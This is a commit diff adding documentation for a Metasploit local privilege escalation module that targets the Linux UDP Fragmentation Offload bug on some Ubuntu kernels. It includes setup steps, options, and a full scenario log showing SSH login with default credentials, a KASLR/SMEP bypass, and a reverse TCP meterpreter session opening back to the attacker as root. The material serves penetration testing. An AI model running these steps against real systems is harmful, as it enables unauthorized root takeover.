Land #9884, add linux ufo priv esc module
This commit is contained in:
Tim W
@@ -0,0 +1,136 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO).
|
||||
|
||||
The bug was initially introduced in October 2005 and patched in September 2017, potentially affecting a large
|
||||
number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
|
||||
4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial), including Linux distros based on Ubuntu
|
||||
such as Linux Mint.
|
||||
|
||||
### Disabling SMAP
|
||||
|
||||
[Original Instructions](https://github.com/rapid7/metasploit-framework/pull/9884#issuecomment-389607805)
|
||||
|
||||
To disable `SMAP` on a system, edit `/etc/default/grub` and add `nosmap` to the `GRUB_CMDLINE_LINUX_DEFAULT` line.
|
||||
Next, `sudo update-grub`, and reboot.
|
||||
|
||||
To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should be returned.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a shell on a vulnerable box
|
||||
3. Do: ```use exploit/linux/local/ufo_privilege_escalation```
|
||||
4. Do: ```set session [#]```
|
||||
5. Do: ```run```
|
||||
6. You should get a root shell.
|
||||
|
||||
## Options
|
||||
|
||||
**WritableDir**
|
||||
|
||||
A folder we can write files to. Defaults to /tmp
|
||||
|
||||
**COMPILE**
|
||||
|
||||
If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto
|
||||
|
||||
## Compiled Executables
|
||||
|
||||
The module makes use of a pre-compiled exploit executable to be
|
||||
used when `gcc` is not available on the target host for live compiling,
|
||||
or `COMPILE` is set to `False`.
|
||||
|
||||
The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
|
||||
|
||||
```bash
|
||||
./x86_64-linux-musl-gcc -o exploit.out -pie -static exploit.c
|
||||
```
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop
|
||||
|
||||
#### Initial Access
|
||||
|
||||
```
|
||||
resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
|
||||
resource (ubuntu.rb)> set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
resource (ubuntu.rb)> set username ubuntu
|
||||
username => ubuntu
|
||||
resource (ubuntu.rb)> set password ubuntu
|
||||
password => ubuntu
|
||||
resource (ubuntu.rb)> exploit
|
||||
[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
|
||||
[*] Command shell session 1 opened (1.1.1.1:45819 -> 2.2.2.2:22) at 2018-04-03 20:58:32 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Escalate
|
||||
|
||||
In this scenario, gcc is installed so we can live compile on the system.
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation
|
||||
msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
msf5 exploit(linux/local/ufo_privilege_escalation) > exploit
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[+] Linux kernel version 4.4.0-31-generic is vulnerable
|
||||
[*] Checking if SMAP is enabled ...
|
||||
[+] SMAP is not enabled
|
||||
[+] System architecture x86_64 is supported
|
||||
[+] Unprivileged user namespaces are permitted
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system...
|
||||
[*] Writing '/tmp/.4UnI1EFL.c' (28356 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 28356 bytes in 2 chunks of 57414 bytes (octal-encoded), using printf
|
||||
[*] Next chunk is 43454 bytes
|
||||
[*] Writing '/tmp/.S6G2g9rnUj' (207 bytes) ...
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
|
||||
[*] Launching exploit ...
|
||||
[*] Transmitting intermediate stager...(106 bytes)
|
||||
[*] Sending stage (857352 bytes) to 2.2.2.2
|
||||
[*] [.] starting
|
||||
[*] [.] checking kernel version
|
||||
[*] [.] kernel version '4.4.0-31-generic' detected
|
||||
[*] [~] done, version looks good
|
||||
[*] [.] checking SMEP and SMAP
|
||||
[*] [~] done, looks good
|
||||
[*] [.] setting up namespace sandbox
|
||||
[*] [~] done, namespace sandbox set up
|
||||
[*] [.] KASLR bypass enabled, getting kernel addr
|
||||
[*] [.] trying /proc/kallsyms...
|
||||
[*] [.] trying /boot/System.map-4.4.0-31-generic...
|
||||
[*] [-] open/read(/boot/System.map-4.4.0-31-generic)
|
||||
[*] [.] trying syslog...
|
||||
[*] [~] done, kernel addr: ffffffff81000000
|
||||
[*] [.] commit_creds: ffffffff8109d760
|
||||
[*] [.] prepare_kernel_cred: ffffffff8109da40
|
||||
[*] [.] SMEP bypass enabled, mmapping fake stack
|
||||
[*] [~] done, fake stack mmapped
|
||||
[*] [.] executing payload ffffffff8104516a
|
||||
[*] [~] done, should be root now
|
||||
[*] [.] checking if we got root
|
||||
[*] [+] got r00t ^_^
|
||||
[*] Cleaning up /tmp/.S6G2g9rnUj and /tmp/.4UnI1EFL ...
|
||||
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60474) at 2018-07-21 13:35:49 -0400
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 2.2.2.2
|
||||
OS : Ubuntu 14.04 (Linux 4.4.0-31-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter >
|
||||
```
|
||||
Reference in New Issue
Block a user